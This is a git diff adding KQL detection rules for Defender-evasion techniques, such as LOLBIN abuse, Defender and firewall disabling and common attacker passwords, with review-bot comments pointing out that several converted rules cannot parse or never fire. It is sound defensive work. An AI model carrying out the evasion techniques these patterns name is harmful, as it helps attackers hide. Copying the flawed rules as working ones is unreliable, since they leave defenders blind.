+| where (FolderPath contains "~1.bat" or FolderPath contains "~1.dll" or FolderPath contains "~1.exe" or FolderPath contains "~1.hta" or FolderPath contains "~1.js" or FolderPath contains "~1.msi" or FolderPath contains "~1.ps1" or FolderPath contains "~1.tmp" or FolderPath contains "~1.vbe" or FolderPath contains "~1.vbs" or FolderPath contains "~2.bat" or FolderPath contains "~2.dll" or FolderPath contains "~2.exe" or FolderPath contains "~2.hta" or FolderPath contains "~2.js" or FolderPath contains "~2.msi" or FolderPath contains "~2.ps1" or FolderPath contains "~2.tmp" or FolderPath contains "~2.vbe" or FolderPath contains "~2.vbs") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe")) and (not((InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or FolderPath endswith "\\VCREDI~1.EXE" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or FolderPath =~ "C:\\PROGRA~1\\WinZip\\WZPREL~1.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_of_remote_exe.kql b/KQL/rules/Defense Evasion/use_of_remote_exe.kql
new file mode 100644
index 00000000..5c626cf3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/use_of_remote_exe.kql
@@ -0,0 +1,12 @@
+// Title: Use of Remote.exe
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-02
+// Level: medium
+// Description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+// - Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg).
+
+DeviceProcessEvents
+| where FolderPath endswith "\\remote.exe" or ProcessVersionInfoOriginalFileName =~ "remote.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql b/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql
new file mode 100644
index 00000000..d7c98ec2
--- /dev/null
+++ b/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql
@@ -0,0 +1,12 @@
+// Title: Use of Scriptrunner.exe
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-01
+// Level: medium
+// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+// False Positives:
+// - Legitimate use when App-v is deployed
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -appvscript " and (FolderPath endswith "\\ScriptRunner.exe" or ProcessVersionInfoOriginalFileName =~ "ScriptRunner.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql b/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql
new file mode 100644
index 00000000..64aa3ad8
--- /dev/null
+++ b/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql
@@ -0,0 +1,10 @@
+// Title: Use Of The SFTP.EXE Binary As A LOLBIN
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-10
+// Level: medium
+// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -D .." or ProcessCommandLine contains " -D C:\\") and FolderPath endswith "\\sftp.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql b/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql
new file mode 100644
index 00000000..e1a365f2
--- /dev/null
+++ b/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql
@@ -0,0 +1,12 @@
+// Title: Use of TTDInject.exe
+// Author: frack113
+// Date: 2022-05-16
+// Level: medium
+// Description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where FolderPath endswith "ttdinject.exe" or ProcessVersionInfoOriginalFileName =~ "TTDInject.EXE"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql b/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql
new file mode 100644
index 00000000..4baa59bb
--- /dev/null
+++ b/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql
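Review bot: In use_of_ttdinject_exe.kql the image check `FolderPath endswith "ttdinject.exe"` has no leading path separator, unlike every sibling rule in this series (`"\\remote.exe"`, `"\\wfc.exe"`, `"\\kd.exe"`), so any image whose file name merely ends in that string also matches. `FolderPath endswith "\\ttdinject.exe"` is the consistent form and is presumably what was intended. The description also reads `executiob`, which should be `execution`.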
@@ -0,0 +1,12 @@
+// Title: Use of VisualUiaVerifyNative.exe
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-01
+// Level: medium
+// Description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate testing of Microsoft UI parts.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\VisualUiaVerifyNative.exe" or ProcessVersionInfoOriginalFileName =~ "VisualUiaVerifyNative.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql b/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql
new file mode 100644
index 00000000..11a3ceae
--- /dev/null
+++ b/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql
@@ -0,0 +1,10 @@
+// Title: Use of VSIISExeLauncher.exe
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-09
+// Level: medium
+// Description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -p " or ProcessCommandLine contains " -a ") and (FolderPath endswith "\\VSIISExeLauncher.exe" or ProcessVersionInfoOriginalFileName =~ "VSIISExeLauncher.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_of_wfc_exe.kql b/KQL/rules/Defense Evasion/use_of_wfc_exe.kql
new file mode 100644
index 00000000..c440a601
--- /dev/null
+++ b/KQL/rules/Defense Evasion/use_of_wfc_exe.kql
@@ -0,0 +1,12 @@
+// Title: Use of Wfc.exe
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-01
+// Level: medium
+// Description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+// - Legitimate use by a software developer
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wfc.exe" or ProcessVersionInfoOriginalFileName =~ "wfc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql b/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql
new file mode 100644
index 00000000..0b23b5b7
--- /dev/null
+++ b/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql
@@ -0,0 +1,12 @@
+// Title: Use Short Name Path in Image
+// Author: frack113, Nasreddine Bencherchali
+// Date: 2022-08-07
+// Level: medium
+// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+// - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.
+
+DeviceProcessEvents
+| where (FolderPath contains "~1\\" or FolderPath contains "~2\\") and (not((((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or (FolderPath endswith "~1\\unzip.exe" or FolderPath endswith "~1\\7zG.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe"))))) and (not(((ProcessVersionInfoProductName =~ "InstallShield (R)" or ProcessVersionInfoFileDescription =~ "InstallShield (R) Setup Engine" or ProcessVersionInfoCompanyName =~ "InstallShield Software Corporation") or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql b/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql
new file mode 100644
index 00000000..bd08cdeb
--- /dev/null
+++ b/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql
@@ -0,0 +1,10 @@
+// Title: UtilityFunctions.ps1 Proxy Dll
+// Author: frack113
+// Date: 2022-05-28
+// Level: medium
+// Description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "UtilityFunctions.ps1" or ProcessCommandLine contains "RegSnapin "
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql b/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql
new file mode 100644
index 00000000..60a0d7e0
--- /dev/null
+++ b/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql
@@ -0,0 +1,10 @@
+// Title: Verclsid.exe Runs COM Object
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects when verclsid.exe is used to run COM object via GUID
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/S" and ProcessCommandLine contains "/C") and (FolderPath endswith "\\verclsid.exe" or ProcessVersionInfoOriginalFileName =~ "verclsid.exe")) and (not(((ProcessCommandLine contains "verclsid.exe\" /S /C {" and ProcessCommandLine contains "} /I {") and InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\RuntimeBroker.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql b/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql
new file mode 100644
index 00000000..bc434146
--- /dev/null
+++ b/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql
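Review bot: The exclusion in verclsid_exe_runs_com_object.kql compares a full absolute path with `endswith`, `InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\RuntimeBroker.exe"`, which is just a slower spelling of equality; the sibling rules in this commit use `=~` for complete paths (for example the explorer.exe exclusion in use_ntfs_short_name_in_image.kql), so `InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\RuntimeBroker.exe"` is the consistent form. This is purely a style point, the predicate behaves the same on well-formed paths.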
@@ -0,0 +1,12 @@
+// Title: Virtualbox Driver Installation or Starting of VMs
+// Author: Janantha Marasinghe
+// Date: 2020-09-26
+// Level: low
+// Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.006, attack.t1564
+// False Positives:
+// - This may have false positives on hosts where Virtualbox is legitimately being used for operations
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "VBoxRT.dll,RTR3Init" or ProcessCommandLine contains "VBoxC.dll" or ProcessCommandLine contains "VBoxDrv.sys") or (ProcessCommandLine contains "startvm" or ProcessCommandLine contains "controlvm")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql b/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql
new file mode 100644
index 00000000..be703a9c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql
@@ -0,0 +1,12 @@
+// Title: Visual Basic Command Line Compiler Usage
+// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
+// Date: 2020-10-07
+// Level: high
+// Description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.004
+// False Positives:
+// - Utilization of this tool should not be seen in enterprise environment
+
+DeviceProcessEvents
+| where FolderPath endswith "\\cvtres.exe" and InitiatingProcessFolderPath endswith "\\vbc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql b/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql
new file mode 100644
index 00000000..be902c9a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql
@@ -0,0 +1,10 @@
+// Title: Wab Execution From Non Default Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: high
+// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (not((FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Program Files\\Windows Mail\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Mail\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql b/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql
new file mode 100644
index 00000000..593ea03a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql
@@ -0,0 +1,10 @@
+// Title: Wab/Wabmig Unusual Parent Or Child Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: high
+// Description: Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\wab.exe" or InitiatingProcessFolderPath endswith "\\wabmig.exe") or ((FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql b/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql
new file mode 100644
index 00000000..9c84f6ec
--- /dev/null
+++ b/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql
@@ -0,0 +1,15 @@
+// Title: Weak or Abused Passwords In CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-14
+// Level: medium
+// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
+An example would be a threat actor creating a new user via the net command and providing the password inline
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+// False Positives:
+// - Legitimate usage of the passwords by users via commandline (should be discouraged)
+// - Other currently unknown false positives
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "123456789" or ProcessCommandLine contains "123123qwE" or ProcessCommandLine contains "Asd123.aaaa" or ProcessCommandLine contains "Decryptme" or ProcessCommandLine contains "P@ssw0rd!" or ProcessCommandLine contains "Pass8080" or ProcessCommandLine contains "password123" or ProcessCommandLine contains "test@202"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql b/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql
new file mode 100644
index 00000000..3039937b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql
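Review bot: The second line of the description in weak_or_abused_passwords_in_cli.kql, `+An example would be a threat actor creating a new user via the net command and providing the password inline`, is emitted without the `//` prefix, so it sits in the file as bare text ahead of `DeviceProcessEvents` and the query will not parse. It should be `// An example would be a threat actor creating a new user via the net command and providing the password inline`, or folded into the preceding Description line. The same unprefixed continuation lines appear in windows_defender_context_menu_removed.kql (two lines), windows_defender_threat_severity_default_action_modified.kql (two lines), wlrmdr_exe_uncommon_argument_or_child_process.kql and write_protect_for_storage_disabled.kql; as each of these is a multi-line Sigma description, the converter presumably prefixes only the first line and needs to prefix every line.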
@@ -0,0 +1,11 @@
+// Title: WFP Filter Added via Registry
+// Author: Frack113
+// Date: 2025-10-23
+// Level: medium
+// Description: Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1562, attack.t1569.002
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\BFE\\Parameters\\Policy\\Persistent\\Filter*" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql b/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql
new file mode 100644
index 00000000..2858ebb0
--- /dev/null
+++ b/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql
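Review bot: `RegistryKey endswith "\\BFE\\Parameters\\Policy\\Persistent\\Filter*"` carries the Sigma wildcard through as a literal asterisk; KQL's `endswith` does not expand `*`, so this predicate only matches a key whose name literally ends in `Filter*` and the rule can never fire. A translation that matches the intended subtree is `RegistryKey contains "\\BFE\\Parameters\\Policy\\Persistent\\Filter"` (or a `matches regex` anchored on the prefix). The same literal-wildcard pattern appears in windows_defender_exclusion_list_modified.kql (`endswith "\\Microsoft\\Windows Defender\\Exclusions*"`), in windows_defender_threat_severity_default_action_modified.kql (`endswith "...ThreatSeverityDefaultAction*"`, which is additionally ANDed with `endswith "\\1"` etc. and so is self-contradictory) and in winget_admin_settings_modification.kql (`RegistryKey =~ "\\REGISTRY\\A*"`, where `startswith` is presumably meant, and whether DeviceRegistryEvents reports keys in that object-path form at all is worth verifying). The sibling windows_defender_exclusions_added_registry.kql already uses `contains` for the same Exclusions key, which is the form to follow.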
@@ -0,0 +1,10 @@
+// Title: Windows Binaries Write Suspicious Extensions
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: high
+// Description: Detects Windows executables that write files with suspicious extensions
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceFileEvents
+| where (((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".txt" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")) or ((InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs"))) and (not(((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dllhost.exe" and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\__PSScriptPolicyTest_") and FolderPath endswith ".ps1") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Program Files\\WindowsApps\\Clipchamp" and FolderPath contains ".ps1")) or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe")) and FolderPath endswith ".ps1" and (FolderPath startswith "C:\\Program 
Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath startswith "C:\\Program Files (x86)\\WindowsApps\\Microsoft.PowerShellPreview")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Windows\\System32\\GroupPolicy\\DataStore\\" and FolderPath contains "\\sysvol\\" and FolderPath contains "\\Policies\\" and FolderPath contains "\\Machine\\Scripts\\Startup\\") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql b/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql
new file mode 100644
index 00000000..d73e7171
--- /dev/null
+++ b/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql
@@ -0,0 +1,15 @@
+// Title: Windows Defender Context Menu Removed
+// Author: Matt Anderson (Huntress)
+// Date: 2025-07-09
+// Level: high
+// Description: Detects the use of reg.exe or PowerShell to delete the Windows Defender context menu handler registry keys.
+This action removes the "Scan with Microsoft Defender" option from the right-click menu for files, directories, and drives.
+Attackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the security product.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - May be part of a system customization or "debloating" script, but this is highly unusual in a managed corporate environment.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "del" or ProcessCommandLine contains "Remove-Item" or ProcessCommandLine contains "ri ") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll", "reg.exe"))) and ProcessCommandLine contains "\\shellex\\ContextMenuHandlers\\EPP"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql b/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql
new file mode 100644
index 00000000..181d55b8
--- /dev/null
+++ b/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql
@@ -0,0 +1,10 @@
+// Title: Windows Defender Definition Files Removed
+// Author: frack113
+// Date: 2021-07-07
+// Level: high
+// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -RemoveDefinitions" and ProcessCommandLine contains " -All") and (FolderPath endswith "\\MpCmdRun.exe" or ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql b/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql
new file mode 100644
index 00000000..da30cb5a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql
@@ -0,0 +1,13 @@
+// Title: Windows Defender Exclusion List Modified
+// Author: @BarryShooshooga
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Intended exclusions by administrators
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Microsoft\\Windows Defender\\Exclusions*"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql b/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql
new file mode 100644
index 00000000..2e6cac82
--- /dev/null
+++ b/KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql
@@ -0,0 +1,12 @@
+// Title: Windows Defender Exclusions Added - Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-07-06
+// Level: medium
+// Description: Detects the Setting of Windows Defender Exclusions
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Administrator actions
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Microsoft\\Windows Defender\\Exclusions"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql b/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql
new file mode 100644
index 00000000..e88fe052
--- /dev/null
+++ b/KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql
@@ -0,0 +1,12 @@
+// Title: Windows Defender Service Disabled - Registry
+// Author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali
+// Date: 2022-08-01
+// Level: high
+// Description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Administrator actions
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000004)" and RegistryKey endswith "\\Services\\WinDefend\\Start"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql b/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql
new file mode 100644
index 00000000..d6ec4baa
--- /dev/null
+++ b/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql
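Review bot: In windows_defender_service_disabled_registry.kql the predicate `RegistryValueData =~ "DWORD (0x00000004)"` keeps the Sysmon `Details` rendering of a DWORD, which is not how DeviceRegistryEvents presents registry data; there RegistryValueData holds the value as a plain decimal string and the type lives in RegistryValueType, so this rule cannot match a real WinDefend start-type change. A translation that fires on MDE data would be `| where RegistryKey endswith "\\Services\\WinDefend\\Start" and RegistryValueType =~ "Dword" and RegistryValueData == "4"`. The `RegistryValueData in~ ("DWORD (0x00000006)", "DWORD (0x00000009)")` clause in windows_defender_threat_severity_default_action_modified.kql has the same problem and would become `RegistryValueData in ("6", "9")`; the converter's registry value mapping is presumably the place to fix both, so worth checking the other registry rules in this commit for the same literal.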
@@ -0,0 +1,16 @@
+// Title: Windows Defender Threat Severity Default Action Modified
+// Author: Matt Anderson (Huntress)
+// Date: 2025-07-11
+// Level: high
+// Description: Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'.
+This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level,
+allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate administration via scripts or tools (e.g., SCCM, Intune, GPO enforcement). Correlate with administrative activity.
+// - Software installations that legitimately modify Defender settings (less common for these specific keys).
+
+DeviceRegistryEvents
+| where (RegistryValueData in~ ("DWORD (0x00000006)", "DWORD (0x00000009)")) and RegistryKey endswith "\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction*" and (RegistryKey endswith "\\1" or RegistryKey endswith "\\2" or RegistryKey endswith "\\4" or RegistryKey endswith "\\5")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql b/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql
new file mode 100644
index 00000000..b82d4d35
--- /dev/null
+++ b/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql
@@ -0,0 +1,10 @@
+// Title: Windows Firewall Disabled via PowerShell
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-14
+// Level: medium
+// Description: Detects attempts to disable the Windows Firewall using PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Set-NetFirewallProfile " and ProcessCommandLine contains " -Enabled " and ProcessCommandLine contains " False") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains " -All " or ProcessCommandLine contains "Public" or ProcessCommandLine contains "Domain" or ProcessCommandLine contains "Private")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql b/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql
new file mode 100644
index 00000000..abfc6b7e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql
@@ -0,0 +1,12 @@
+// Title: Windows Kernel Debugger Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: medium
+// Description: Detects execution of the Windows Kernel Debugger "kd.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+// - Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required
+
+DeviceProcessEvents
